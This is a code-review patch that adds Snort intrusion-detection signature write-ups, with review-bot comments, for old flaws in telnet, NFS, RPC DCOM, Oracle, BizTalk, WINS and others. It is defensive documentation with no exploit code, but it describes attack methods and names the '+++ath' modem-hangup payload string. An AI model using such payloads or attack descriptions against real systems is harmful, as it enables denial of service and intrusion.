+--
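Review bot: grammar in Summary: "a webpage was visited the included the content "fetish"" should read "that included". The Additional References section is followed by seven blank lines before the closing separator; trim them. False Positives ends with "etc.etc.", which should be dropped or turned into a proper sentence. The layout (no blank line between "Rule:" and "--", a blank line between "Sid:" and its value) also differs from the other files.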
--- /dev/null
+++ b/doc/signatures/2304.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2304
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to access the file
+files.inc.php on a web server running a PHP application. This may lead
+to information disclosure, further attacks against the system may be
+possible with the information gained,
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
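Review bot: Attack Scenarios is mismatched with the rest of the file: Impact is "Information gathering" and Detailed Information describes access to "files.inc.php" leading to information disclosure, but Attack Scenarios talks about supplying credentials to an authentication mechanism and gaining administrator access, which is boilerplate from the CGI files. Replace it with the actual scenario, a direct request for the include file to read its contents. Detailed Information ends with a comma ("possible with the information gained,") instead of a period, and Additional References is empty.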
--- /dev/null
+++ b/doc/signatures/492.txt
@@ -0,0 +1,102 @@
+Rule:
+  
+--
+
+Rule:
+--
+Sid:
+492
+
+--
+
+Summary:
+This event is generated when an unsuccessful login attempt was made via telnet.
+
+--
+
+Impact:
+Possible unauthorized access via password brute-forcing
+
+An attacker may have attempted to gain access to a valid user's account 
+via the telnet service, but did not succeed.  The telnet service is 
+running, which uses insecure authentication mechanisms.
+
+--
+
+Detailed Information:
+A user tried to log on to a system via telnet, but has been rejected,
+either due to invalid username, password, or both. This could mean 
+someone is trying to log on without proper password (if there are 
+multiple unsuccessful logins) or they may have just mistyped the 
+username or the password.
+
+The telnet server typically runs on TCP port 23.  Upon access to the
+server, account access is granted based on an unencrypted user name and
+password.  Upon a failed login (resulting from either an invalid account
+or an incorrect password), a login failure message will be returned.
+This rule matches the common text "Login failed".
+
+--
+
+Affected Systems:
+Any system running a telnet server.
+
+--
+
+Attack Scenarios:
+Attackers can, particularly when armed with a valid account name,
+attempt to use guessing attacks or brute-force means to gain access via
+the telnet service.  Many successive events of this type would likely be
+indicative of such an attack.
+
+The use of a telnet server allows the passive attack of traffic
+sniffing, which can extract a username and password from any valid
+login.
+
+--
+
+Ease of Attack:
+Simple.
+
+This event indicates it is possible to perform a brute-force attack; the
+ease of such an attack is dependent upon the strength of passwords, and
+rate-limiting techniques employed by the telnet server in question.
+
+--
+
+False Positives:
+This event will match any badly-typed or -remembered password, and will
+therefore generate a false positive.  Look for rapid successive events.
+
+--
+
+False Negatives:
+If a password is correctly guessed, no failure will be noted.
+
+--
+
+Corrective Action:
+Check how many invalid attempts occurred, change the password of the 
+user that tried to log in.
+
+It is best to avoid using telnet whenever possible; its authentication
+system is lacking, and encryption is generally unavailable.  If your
+telnet server can be configured to temporarily disable access after
+rapid successive failures, it as advised that you do so.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Chaos <c@aufbix.org> and Nick Black, Reflex Security <dank@reflexsecurity.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+
+Additional References:
+
+Telnet RFC:
+http://www.faqs.org/rfcs/rfc854.html
+
+--
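Review bot: the file opens with a duplicated header: "Rule:" followed by a whitespace-only line, "--", a blank line, and a second "Rule:" before "Sid:"; drop the first four lines so the layout matches the other signature documents. Also "it as advised that you do so" in Corrective Action should read "it is advised", the "-- " separator after Contributors has trailing whitespace, and since Detailed Information states the rule matches the literal text "Login failed", False Negatives should mention telnet servers that return a different failure banner rather than "If a password is correctly guessed" alone.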
--- /dev/null
+++ b/doc/signatures/1043.txt
@@ -0,0 +1,65 @@
+Rule:
+--
+Sid:
+1043
+--
+Summary:
+This event is generated when an attempt is made to access the file 
+'viewcode.asp' on a web server.
+--
+Impact:
+If successful, this attack will display the contents of any file on the 
+server.   In addition, it has been reported that this tool is vulnerable
+to a denial of service attack.
+--
+Detailed Information:
+'viewcode.asp' is a utility that ships with various Microsoft products 
+and is meant to allow web site administrators to view the code of active
+server pages during development.   As it will display the contents of 
+any file on the server, it should not be present on a production system,
+but is installed by default with some products or as an option on 
+others.
+
+Also, the tool may be vulnerable to a denial of service attack.
+
+--
+Affected Systems:
+	Microsoft Site Server 3.0
+	Microsoft Site Server 3.0 Commerce Edition
+	Microsoft Commercial Internet System 2.0
+	Microsoft BackOffice Server 4.0
+	Microsoft BackOffice Server 4.5
+	Microsoft Internet Information Server 4.0
+
+--
+Attack Scenarios:
+An attacker can use this tool to steal data or to gather user 
+names/passwords and other information that could facilitate other types 
+of attack.
+--
+Ease of Attack:
+Simple. No exploit software required.
+--
+False Positives:
+None.
+--
+False Negatives:
+None.
+--
+Corrective Action:
+Remove any copies of 'viewcode.asp' from your server.
+--
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+Insecure.org
+http://www.insecure.org/sploits/ms.backoffice.source.html
+
+Microsoft
+http://support.microsoft.com/default.aspx?scid=kb;en-us;Q231368&sd=tech
+
+--
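Review bot: False Positives says "None." although Detailed Information describes 'viewcode.asp' as a utility meant for administrators to view page source during development, so legitimate use on a development server will also fire this rule; say so. Minor: the separator after Contributors is "-- " with trailing whitespace, and the Impact sentence "In addition, it has been reported that this tool is vulnerable to a denial of service attack" repeats the "Also, the tool may be vulnerable to a denial of service attack" sentence in Detailed Information.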
--- /dev/null
+++ b/doc/signatures/1952.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1952
+
+--
+Summary:
+This event is generated when an attempt is made to mount a specific file system exported through Network File System (NFS). 
+
+--
+Impact:
+Remote access.  This mount request can give an attacker remote access to an NFS directory if it is successful. 
+
+--
+Detailed Information:
+The mountd Remote Procedure Call (RPC) implements the NFS mount protocol.  When an NFS client requests a mount of an NFS file system, mountd examines the list of exported file systems.  If the NFS client is permitted access to the requested file system, mountd returns a file handle for the requested directory.  An attacker or legitimate NFS client may request a mount of a specific file system.
+
+--
+Affected Systems:
+All systems running NFS.
+
+--
+Attack Scenarios:
+An attacker may attempt to mount an NFS directory to read or change files.
+
+--
+Ease of Attack:
+Simple.   
+
+--
+False Positives:
+If a legitimate remote user is allowed to mount NFS file systems, this rule may trigger.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
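Review bot: Summary and Detailed Information say the rule fires on a mount request for "a specific file system" but never name that file system, so the reader cannot tell what distinguishes this signature from the other NFS mount rules; state the export the rule matches. The Corrective Action line "Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines." reads as if the RPC hosts themselves are being denied; "to ensure external access to RPC-enabled machines is denied" is clearer. Additional References is empty.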
--- /dev/null
+++ b/doc/signatures/2802.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2802
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure check_ddl_text
+. This procedure is included in
+dbms_repcat_rgt.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
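Review bot: the sentence in Detailed Information is broken so that a lone "." begins the line after "check_ddl_text"; join it as "vulnerability in the procedure check_ddl_text. This procedure is included in dbms_repcat_rgt." Also "Oracle Oracle9i" in Affected Systems repeats the vendor name, "Apply the appropriate vendor supplied patch" lacks a period, and several "-- " separators carry trailing whitespace.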
--- /dev/null
+++ b/doc/signatures/1951.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1951
+
+--
+Summary:
+This event is generated when an attempt is made to mount a specific file system exported through Network File System (NFS). 
+
+--
+Impact:
+Remote access.  This mount request can give an attacker remote access to an NFS directory.
+
+--
+Detailed Information:
+The mountd Remote Procedure Call (RPC) implements the NFS mount protocol.  When an NFS client requests a mount of an NFS file system, mountd examines the list of exported file systems.  If the NFS client is permitted access to the requested file system, mountd returns a file handle for the requested directory.  An attacker or legitimate NFS client may request a mount of a specific file system.
+
+--
+Affected Systems:
+All systems running NFS.
+
+--
+Attack Scenarios:
+An attacker may attempt a mount of an NFS directory to read or change files.
+
+--
+Ease of Attack:
+Simple.   
+
+--
+False Positives:
+If a legitimate remote user is allowed to mount NFS file systems, this rule may trigger.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
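Review bot: apart from the Sid and one clause in Impact, this file is word-for-word the same as 1952.txt above, so neither document says which exported file system distinguishes sid 1951 from sid 1952; add the file system name each rule matches so the two entries differ in substance. The same awkward "ensure access is denied to RPC-enabled machines" line in Corrective Action appears here and should be reworded in both files.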
--- /dev/null
+++ b/doc/signatures/3383.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3383
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
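Review bot: "Expoit" in Ease of Attack should be "Exploit". Additional References is empty although Corrective Action tells the reader to "Apply the appropriate vendor supplied patches"; cite the vendor advisory for the RPC DCOM issue so the reader can locate those patches. The Corrective Action port list should also state that blocking 135, 139 and 445 at the perimeter does not protect against hosts inside the filtered network.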
--- /dev/null
+++ b/doc/signatures/274.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+274
+
+--
+Summary:
+This event is generated when an attempt is made to issue a Denial of Service attack that works against some modems.
+
+--
+Impact:
+The system may be disconnected from it's dial-up connection.
+
+--
+Detailed Information:
+An ICMP Echo Request is sent to a target system with a payload that
+includes "+++ath".  The "+++" is an attention sequence that allows a
+user to enter commands to the modem.  "ath" is the modem hangup command.
+An ICMP Echo Reply includes the same payload as the associated request.
+On some modems, when the machine tries to reply to this packet, "+++ath"
+will be interpreted as a command and the modem will hangup.  The remote
+address can be spoofed.
+
+--
+Affected Systems:
+unknown
+
+--
+Attack Scenarios:
+A user can remotely cause a modem to disconnect.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Set a guard time on the modem. Contact the modem manufacturer for
+details. A guard time will cause the modem to wait after receiving
+"+++". Any further input during this wait, including "ath", will be 
+disregarded. 
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS264
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=3DCAN-1999-1228
+
+Security Focus:
+http://www.securityfocus.com/archive/1/10706
+
+--
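Review bot: the CVE link in Additional References contains "=3DCAN-1999-1228", a quoted-printable remnant in which "=3D" stands for "="; it should read "name=CAN-1999-1228" or the link will not resolve. Also "it's dial-up connection" in Impact should be "its", "unknown" under Affected Systems is lowercase unlike the other files, and the Contributors line is missing a space before "<alexander.s@mccd.edu>".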
--- /dev/null
+++ b/doc/signatures/1047.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1047
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
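Review bot: the Detailed Information is generic and never states which URI or request content the rule matches, unlike 1043.txt in this patch which names 'viewcode.asp'; add the matched pattern so the reader can judge the "None known" False Positives claim. "the attackers choosing" in Impact should be "the attacker's choosing".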
--- /dev/null
+++ b/doc/signatures/458.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+458
+
+--
+
+Summary:
+This event is generated when an ICMP Type 1 datagram with an undefined ICMP Code is detected on the network. 
+
+--
+
+Impact:
+ICMP Type 1 datagrams are not currently used by any known devices.
+
+--
+
+Detailed Information:
+ICMP Type 1 is not defined for use and is not expected network activity.  Any ICMP datagram with an undefined ICMP Code should be investigated.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Ingress filtering should be utilized to block incoming ICMP Type 1 datagrams
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+None
+
+
+--
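Review bot: the Summary ("ICMP Type 1 datagram with an undefined ICMP Code") and Detailed Information ("ICMP Type 1 is not defined for use") disagree on whether the rule keys on an undefined code within Type 1 or on the type itself; align the two. This file also lacks the Affected Systems section present in every other document in this patch, the separators after False Negatives and Corrective Action are missing the blank line used elsewhere, and the Impact section states that the type is unused rather than describing an impact.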
--- /dev/null
+++ b/doc/signatures/1211.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1211
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
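Review bot: "running ona web server" in Detailed Information should be "on a web server", and "attackers choosing" should be "attacker's choosing" (Impact and Detailed Information). As with 1047.txt, the text never names the CGI script or request pattern the rule matches, and Additional References is empty.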
--- /dev/null
+++ b/doc/signatures/3007.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+3007
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the DELETE command of the IPSwitch IMail IMAP service.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+A vulnerability exists in the way that the IPSwitch IMail IMAP service
+handles a DELETE command.  An excessively long user-supplied mailbox name
+to be deleted can trigger a denial of service or a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+	IPSwitch IMail IMAP4 server 8.13
+
+--
+Attack Scenarios:
+An attacker can supply an overly long mailbox name for deletion, possibly causing
+denial of service or a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000144.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+100000144
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+directory traversal associated with Imail Web Calendaring
+servicel
+
+--
+Impact:
+A successful attack can permit a user to navigate outside
+of the web root directory and read files.
+
+--
+Detailed Information:
+The Imail Web Calendaring Server does not properly sanitize
+a malformed URL that contains directory traversal characters.
+This vulnerability is associated with static objects identified
+by names ending in .jsp, .jpg, .gif, .wav, .css, or .htm.  This
+can permit an unauthorized user to examine files that may contain
+sensitive information.
+
+--
+Affected Systems:
+Ipswitch IMail Server 8.2 and prior
+Ipswitch IMail Server 8.15 and prior
+
+--
+Attack Scenarios:
+An attacker send a URI containing a directory traversal to view
+sensitive files on a vulnerable server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+Other:
+
+--
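Review bot: "Imail Web Calendaring servicel" in Summary should end "service."; "An attacker send a URI" should be "sends"; "Additional References" lacks its colon and the "Other:" entry beneath it is empty. Affected Systems lists both "8.2 and prior" and "8.15 and prior", which overlap; clarify whether these are two product lines or collapse them into one entry. Vendor spelling also differs between "Ipswitch" here and "IPSwitch" in 3007.txt.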
--- /dev/null
+++ b/doc/signatures/2028.txt
@@ -0,0 +1,88 @@
+Rule:
+
+--
+Sid:
+2028
+
+--
+Summary:
+A user can change their password for Network Information Services (NIS) 
+using the ypasswd command. A vulnerability exists in ypasswd where
+an overly long username can cause a buffer overflow resulting in 
+unauthorized access to the remote machine.
+
+--
+Impact:
+Unauthorized super user access to the vulnerable host resulting in a 
+compromise of all data on the host and any network resources that host 
+is connected to. Full control of the victim is gained.
+
+--
+Detailed Information:
+The rpc.ypasswd service processes all password changes from 
+ypasswd. Supplying a specially crafted request to a NIS server 
+running this daemon in the form of a long username, the attacker can 
+cause a buffer overflow in that process.
+
+Since all master servers handling NIS resources run this daemon, the 
+resulting root access affects all NIS resources available on the LAN.
+
+An exploit for this vulnerability exists, hosts that have been 
+compromised using this vulnerability typically display two instances of 
+inetd running at the same time. The result of the exploit is a root 
+shell attached to port 77 of the host.
+
+--
+Affected Systems:
+	Caldera OpenServer 5.0.5
+	Caldera OpenServer 5.0.6
+	Solaris 2.6
+	Solaris 7
+	Solaris 8
+
+--
+Attack Scenarios:
+The attacker needs to craft a specially formulated request to the 
+rpc.ypasswd service containing a long username. An exploit for this 
+vulnerability exists.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply pacthes for the affected systems as soon as possible.
+
+Disable the rpc.ypasswd daemon.
+
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CIAC:
+http://www.ciac.org/ciac/bulletins/m-008.shtml
+
+Security Focus Mailing List Archive:
+http://www.securityfocus.com/archive/1/187086
+
+CERT:
+http://www.kb.cert.org/vuls/id/327281
+
+--
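Review bot: "pacthes" in Corrective Action should be "patches". "An exploit for this vulnerability exists, hosts that have been compromised ..." is a comma splice; start a new sentence at "Hosts". Please also confirm the spelling of "ypasswd" and "rpc.ypasswd" against the daemon name used in the linked CERT note, since the same names recur throughout the file and in the Corrective Action "Disable the rpc.ypasswd daemon." line.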
--- /dev/null
+++ b/doc/signatures/100000106.txt
@@ -0,0 +1,90 @@
+Rule: 
+
+--
+Sid: 
+100000106
+
+-- 
+Summary: 
+This event is generated when an SQL injection attempt is made against the 
+Microsoft BizTalk Server DTA Interface.
+
+-- 
+
+Impact: 
+Attackers may retreive or modify sensitive in formation stored in the affected 
+database. Additionally, attackers may use the database's functionality to 
+execute arbitrary commands on the system with the priviliges of the user 
+running the script, typically Administrator.
+
+--
+Detailed Information:
+This rule looks specifically for attacks against the rawdocdata.asp module of 
+the DTA Interface which contain the string "exec", which is required to run 
+commands on the host system. Thus, this rule does not detect generic SQL 
+injection attempts, only command execution attempts.
+
+--
+Affected Systems:
+Microsoft BizTalk Server 2000 Developer Edition SP2
+Microsoft BizTalk Server 2000 Developer Edition SP1a
+Microsoft BizTalk Server 2000 Developer Edition
+Microsoft BizTalk Server 2000 Enterprise Edition SP2
+Microsoft BizTalk Server 2000 Enterprise Edition SP1a
+Microsoft BizTalk Server 2000 Enterprise Edition
+Microsoft BizTalk Server 2000 Standard Edition SP2
+Microsoft BizTalk Server 2000 Standard Edition SP1a
+Microsoft BizTalk Server 2000 Standard Edition
+Microsoft BizTalk Server 2002 Developer Edition
+Microsoft BizTalk Server 2002 Enterprise Edition
+
+--
+
+Attack Scenarios: 
+A web browser or a script may be used to exploit this vulnerability.
+
+-- 
+
+Ease of Attack: 
+Simple, as example attacks that can be used with a web browser are publicly 
+available.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Patches which correct this problem are available from Microsoft.com.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+Microsoft BizTalk Server 2000 Enterprise Edition SP2: 
+http://microsoft.com/downloads/details.aspx?FamilyId=001E93E4-0E6E-4289-AEFE-916
+1D2E5AF97&displaylang=en
+Microsoft BizTalk Server 2000 Developer Edition SP2: 
+http://microsoft.com/downloads/details.aspx?FamilyId=001E93E4-0E6E-4289-AEFE-916
+1D2E5AF97&displaylang=en
+Microsoft BizTalk Server 2000 Standard Edition SP2: 
+http://microsoft.com/downloads/details.aspx?FamilyId=001E93E4-0E6E-4289-AEFE-916
+1D2E5AF97&displaylang=en
+
+Microsoft BizTalk Server 2002 Enterprise Edition: 
+http://microsoft.com/downloads/details.aspx?FamilyId=A05344FE-2622-4887-AA45-3DE
+7C4ED3C75&displaylang=en
+
+Microsoft BizTalk Server 2002 Developer Edition: 
+http://microsoft.com/downloads/details.aspx?FamilyId=A05344FE-2622-4887-AA45-3DE
+7C4ED3C75&displaylang=en
+
+-- 
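Review bot: the download URLs in Additional References are wrapped mid-string ("...AEFE-916" / "1D2E5AF97&displaylang=en"), so they are not usable as written; keep each URL on a single line. Typos in Impact: "retreive", "in formation", "priviliges". The same SP2 URL is repeated for all three 2000 editions and the same 2002 URL for both 2002 editions; one entry per URL would do. Several "-- " separators carry trailing whitespace.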
--- /dev/null
+++ b/doc/signatures/1890.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1891
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an
+unvalidated format string error associated the with Remote Procedure
+Call (RPC) statd.
+
+--
+Impact:
+Remote root access. If successful, this exploit allows execution of
+arbitrary commands as root.
+
+--
+Detailed Information:
+The statd RPC services implements a component of the Network File System
+(NFS) known as the Network Status and Monitor protocol.  A vulnerability
+exists due to improper format string checking that allows arbitrary code
+to be executed with the privileges of statd, usually root.
+
+--
+Affected Systems:
+	Conectiva Linux 4.0, 4.0, 4.1, 4.2, 5.0, 5.1
+	Debian Linux 2.2, 2.3
+	RedHat Linux 6.0, 6.1, 6.2
+	RedHat nfs-utils-0.1.6-2.i386.rpm + RedHat Linux 6.2
+	SuSE Linux 6.3, 6.4, 7.0
+	Trustix Secure Linux 1.0, 1.1
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where statd
+runs and send the exploit to the statd port. If the portmapper port is
+blocked, the attacker may send the exploit to any listening port in the
+range associated with RPC services.
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
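Review bot: the file is doc/signatures/1890.txt but the Sid field says 1891; one of the two is wrong and the documentation will be attached to the wrong rule. Also "associated the with Remote Procedure Call" in Summary has the words transposed, "The statd RPC services implements" should be "service implements", and "Conectiva Linux 4.0, 4.0" in Affected Systems repeats a version.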
--- /dev/null
+++ b/doc/signatures/3195.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+3195
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft WINS.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft WINS such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker would need to send multiple malformed request to the WINS
+service running on a host.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Uninstall the WINS service.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
